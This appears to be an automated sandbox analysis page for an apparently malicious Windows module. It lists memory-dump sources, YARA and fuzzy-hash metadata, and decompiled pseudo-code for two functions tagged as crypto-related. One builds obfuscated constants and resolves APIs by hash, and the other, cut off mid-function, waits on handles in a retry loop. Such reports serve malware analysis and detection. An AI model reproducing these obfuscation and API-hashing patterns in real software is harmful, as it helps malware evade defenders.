0x708c9d6c
0x708c9d6f
0x00000000
0x00000000
0x708c9d75
0x708c9d7a
0x708c9d81
0x708c9d8e
0x708c9d90
0x00000000
0x00000000
0x00000000
0x708c9d90
0x708c9d28
0x708c9d2f
0x00000000
0x708c9d2f
0x708c9c36
0x708c9c41
0x708c9c4f
0x708c9c54
0x708c9c56
0x708c9c59
0x708c9c62
0x708c9c66
0x708c9c6e
0x708c9c74
0x708c9c78
0x708c9c7e
0x708c9c8b
0x708c9c8f
0x708c9c93
0x708c9c9b
0x708c9ca1
0x708c9ca6
0x708c9ca8
0x00000000
0x00000000
0x708c9cac
0x708c9cad
0x708c9cb2
0x708c9cbc
0x708c9cc3
0x708c9cce
0x708c9cd5
0x00000000
0x00000000
0x00000000
0x708c9cd5
0x00000000
0x708c9d96
0x708c9d96
0x708c9d9f
0x708c9da0
0x708c9da2
0x708c9da2
0x00000000
0x708c9dab
0x708c9449
0x708c944d
0x708c9456
0x708c945f
0x00000000

Strings

$EA, xrefs: 708C91E1

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $EA
API String ID: 0-4251458306
Opcode ID: 83ccad380c5a66874521571f89128369ded0c2689c7363f8d87e6cbea4938a26
Instruction ID: 3b7667684bbd0deee41230af548fc423a386479bca57842b1cf80d1a79122ffa
Opcode Fuzzy Hash: 83ccad380c5a66874521571f89128369ded0c2689c7363f8d87e6cbea4938a26
Instruction Fuzzy Hash: 3AA238714047419ED721DF28C852BDFB7B6EF95300F008AADB5999B2A2EF30E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 708C1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E708C1494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E708CF620( &_v72, 0);
				_v60 = 0x22dc1034;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v76, E708CF568( &_v76) + 0x10);
				E708CF558( &_v80, E708CF568( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x853cdd04;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v84, E708CF568(_t325) + 0x10);
				E708CF558( &_v88, E708CF568( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xb162dc4e;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v92, E708CF568(_t329) + 0x10);
				E708CF558( &_v96, E708CF568( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0xc15ccc53;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v100, E708CF568(_t333) + 0x10);
				E708CF558( &_v104, E708CF568( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xc8fc2de6;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v108, E708CF568(_t337) + 0x10);
				E708CF558( &_v112, E708CF568( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x7d07f92f;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v116, E708CF568(_t341) + 0x10);
				E708CF558( &_v120, E708CF568( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xfc7fa539;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v124, E708CF568(_t345) + 0x10);
				E708CF558( &_v128, E708CF568( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x4145240a;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v132, E708CF568(_t349) + 0x10);
				E708CF558( &_v136, E708CF568( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x2c2324e8;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v140, E708CF568(_t353) + 0x10);
				E708CF558( &_v144, E708CF568( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xf06b4c6b;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v148, E708CF568(_t357) + 0x10);
				E708CF558( &_v152, E708CF568( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xa54975b2;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v156, E708CF568(_t361) + 0x10);
				E708CF558( &_v160, E708CF568( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x563e1998;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v164, E708CF568(_t365) + 0x10);
				E708CF558( &_v168, E708CF568( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0xd926c223;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v172, E708CF568(_t369) + 0x10);
				E708CF558( &_v176, E708CF568( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x80febacc;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v180, E708CF568(_t373) + 0x10);
				E708CF558( &_v184, E708CF568( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x98595b64;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v188, E708CF568(_t377) + 0x10);
				E708CF558( &_v192, E708CF568( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x8e3b5f9c;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v196, E708CF568(_t381) + 0x10);
				E708CF558( &_v200, E708CF568( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x9b42cb07;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v204, E708CF568(_t385) + 0x10);
				E708CF558( &_v208, E708CF568( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E708D413C(0xa5eabdf8, _t434);
				E708CF558( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E708CF558( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E708CF558( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E708CF558( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E708CF558( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E708CF558( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E708CF558( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E708CF558( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E708CF558( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E708CF558( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E708CF558( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E708CF558( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E708CF558( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E708CF558( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E708CF558( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E708CF558( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E708CF558( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E708C1D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E708CB338( &_v248, _v256, _t481, _v252, _t318);
				E708CF8DC( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xfb42c037;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v296, E708CF568(_t410) + 0x10);
				E708CF558( &_v300, E708CF568( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x7082aaf3;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v304, E708CF568(_t414) + 0x10);
				E708CF558( &_v308, E708CF568( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x1eeb5e35;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v312, E708CF568(_t418) + 0x10);
				E708CF558( &_v316, E708CF568( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xe856fc47;
				asm("movq [ecx+0x18], xmm0");
				E708CF8C4( &_v320, E708CF568(_t422) + 0x10);
				E708CF558( &_v324, E708CF568( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E708CBAB8(_t154,  *_t480);
				E708CF558( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E708CF558( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E708CF558( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E708CF558( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E708CF6F0( &_v316);
				return E708CF6F0( &_v356);
			}

0x708c1494
0x708c1498
0x708c149d
0x708c14a3
0x708c14ab
0x708c14b0
0x708c14bc
0x708c14c0
0x708c14d2
0x708c14e8
0x708c14f3
0x708c14f4
0x708c14f5
0x708c14f6
0x708c14f7
0x708c14fa
0x708c14fe
0x708c1502
0x708c1509
0x708c151b
0x708c1531
0x708c153c
0x708c153d
0x708c153e
0x708c153f
0x708c1540
0x708c1543
0x708c1547
0x708c154b
0x708c1552
0x708c1564
0x708c157a
0x708c1585
0x708c1586
0x708c1587
0x708c1588
0x708c1589
0x708c158c
0x708c1590
0x708c1594
0x708c159b
0x708c15ad
0x708c15c3
0x708c15ce
0x708c15cf
0x708c15d0
0x708c15d1
0x708c15d2
0x708c15d5
0x708c15d9
0x708c15dd
0x708c15e4
0x708c15f6
0x708c160c
0x708c1617
0x708c1618
0x708c1619
0x708c161a
0x708c161b
0x708c161e
0x708c1622
0x708c1626
0x708c162d
0x708c163f
0x708c1655
0x708c1660
0x708c1661
0x708c1662
0x708c1663
0x708c1664
0x708c1667
0x708c166b
0x708c166f
0x708c1676
0x708c1688
0x708c169e
0x708c16a9
0x708c16aa
0x708c16ab
0x708c16ac
0x708c16ad
0x708c16b0
0x708c16b4
0x708c16b8
0x708c16bf
0x708c16d1
0x708c16e7
0x708c16f2
0x708c16f3
0x708c16f4
0x708c16f5
0x708c16f6
0x708c16f9
0x708c16fd
0x708c1701
0x708c1708
0x708c171a
0x708c1730
0x708c173b
0x708c173c
0x708c173d
0x708c173e
0x708c173f
0x708c1742
0x708c1746
0x708c174a
0x708c1751
0x708c1763
0x708c1779
0x708c1784
0x708c1785
0x708c1786
0x708c1787
0x708c1788
0x708c178b
0x708c178f
0x708c1793
0x708c179a
0x708c17ac
0x708c17c2
0x708c17cd
0x708c17ce
0x708c17cf
0x708c17d0
0x708c17d1
0x708c17d4
0x708c17d8
0x708c17dc
0x708c17e3
0x708c17f5
0x708c180b
0x708c1816
0x708c1817
0x708c1818
0x708c1819
0x708c181a
0x708c181d
0x708c1821
0x708c1825
0x708c182c
0x708c183e
0x708c1854
0x708c185f
0x708c1860
0x708c1861
0x708c1862
0x708c1863
0x708c1866
0x708c186a
0x708c186e
0x708c1875
0x708c1887
0x708c189d
0x708c18a8
0x708c18a9
0x708c18aa
0x708c18ab
0x708c18ac
0x708c18af
0x708c18b3
0x708c18b7
0x708c18be
0x708c18d0
0x708c18e6
0x708c18f1
0x708c18f2
0x708c18f3
0x708c18f4
0x708c18f5
0x708c18f8
0x708c18fc
0x708c1900
0x708c1907
0x708c1919
0x708c192f
0x708c193a
0x708c193b
0x708c193c
0x708c193d
0x708c193e
0x708c1941
0x708c1945
0x708c1949
0x708c1950
0x708c1962
0x708c1978
0x708c1983
0x708c1984
0x708c1985
0x708c1986
0x708c198c
0x708c198f
0x708c1991
0x708c199c
0x708c19a3
0x708c19ac
0x708c19b4
0x708c19bb
0x708c19c4
0x708c19cc
0x708c19d3
0x708c19dc
0x708c19e4
0x708c19eb
0x708c19f4
0x708c19fc
0x708c1a03
0x708c1a0c
0x708c1a14
0x708c1a1b
0x708c1a24
0x708c1a2c
0x708c1a36
0x708c1a3f
0x708c1a47
0x708c1a51
0x708c1a5a
0x708c1a62
0x708c1a6c
0x708c1a75
0x708c1a7d
0x708c1a87
0x708c1a90
0x708c1a98
0x708c1aa2
0x708c1aab
0x708c1ab3
0x708c1abd
0x708c1ac6
0x708c1ace
0x708c1ad8
0x708c1ae1
0x708c1ae9
0x708c1af3
0x708c1afc
0x708c1b04
0x708c1b0e
0x708c1b17
0x708c1b1f
0x708c1b26
0x708c1b2f
0x708c1b37
0x708c1b3e
0x708c1b43
0x708c1b51
0x708c1b55
0x708c1b64
0x708c1b6d
0x708c1b72
0x708c1b79
0x708c1b7d
0x708c1b81
0x708c1b88
0x708c1b9a
0x708c1bb0
0x708c1bbb
0x708c1bbc
0x708c1bbd
0x708c1bbe
0x708c1bbf
0x708c1bc2
0x708c1bc6
0x708c1bca
0x708c1bd1
0x708c1be3
0x708c1bf9
0x708c1c04
0x708c1c05
0x708c1c06
0x708c1c07
0x708c1c08
0x708c1c0b
0x708c1c0f
0x708c1c13
0x708c1c1a
0x708c1c2c
0x708c1c42
0x708c1c4d
0x708c1c4e
0x708c1c4f
0x708c1c50
0x708c1c51
0x708c1c54
0x708c1c58
0x708c1c5c
0x708c1c63
0x708c1c75
0x708c1c8b
0x708c1c96
0x708c1c97
0x708c1c98
0x708c1c99
0x708c1c9a
0x708c1c9d
0x708c1ca0
0x708c1ca1
0x708c1ca2
0x708c1ca9
0x708c1cac
0x708c1cb7
0x708c1cbe
0x708c1cc7
0x708c1ccf
0x708c1cd6
0x708c1cdf
0x708c1ce7
0x708c1cee
0x708c1cf7
0x708c1cff
0x708c1d04
0x708c1d0d
0x708c1d15
0x708c1d2a

Strings

$#,, xrefs: 708C1701

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $#,
API String ID: 0-2557146312
Opcode ID: cd9534a2ee76e5f9b51c6ded45e75b537bfc0811318d56a54096286348dae985
Instruction ID: 43c1e59faf11069f4897736954f903313e35abdc7178d39a118e273bdade6127
Opcode Fuzzy Hash: cd9534a2ee76e5f9b51c6ded45e75b537bfc0811318d56a54096286348dae985
Instruction Fuzzy Hash: F832C572404B059ED705DF28C862A9FB3B1EFB2205F10875DB5992A1A2FF71FA86C741

Uniqueness

Uniqueness Score: -1.00%

Function 708CA5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E708CA5A4(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E708CB714(_t439 + 0x24, _t392, 0x7fffffff);
					if(E708CF56C(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E708CF6F0(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E708D218C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E708CF6F0(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E708CF620(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E708CF620(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x708db7a8]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E708D2F8C(0xa5eabdf8, 0xd1a06a90);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E708CF558( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E708CF558( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E708CB680(_t439 + 0x34);
											E708CB680(_t439 + 8);
											goto L65;
										}
										L62:
										E708CB680(_t439 + 0x34);
										E708CB680(_t439 + 8);
										goto L63;
									}
									_t392 = E708CF558(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E708CCB48(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E708CC33C(_t324);
									if(__eflags != 0) {
										break;
									}
									E708CF8C4(_t439 + 0x14, E708CF568(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E708CF558(_t439 + 0x14, E708CF568(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E708D2F8C(0xa5eabdf8, 0xf3119fba);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E708CF8C4(_t439 + 0x40, E708CF568(_t439 + 0x3c) + 4);
											 *(E708CF558(_t439 + 0x40, E708CF568(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E708CCDE0(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E708CF558( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E708CF558(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E708CAD04(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E708CCDE0(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E708CF558( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E708CF568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E708CF568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E708CF558( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E708CF558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E708D382C( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E708CF568( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E708CF8C4( *((intOrPtr*)(_t439 + 8)), E708CF568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E708CF568( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E708CF568( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E708CF558( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E708CF558( *((intOrPtr*)(_t439 + 4)), _t413);
										E708D382C(_t243,  *((intOrPtr*)(_t439 + 0x98)), E708CF568( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E708CF8C4( *((intOrPtr*)(_t439 + 4)), E708CF568( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
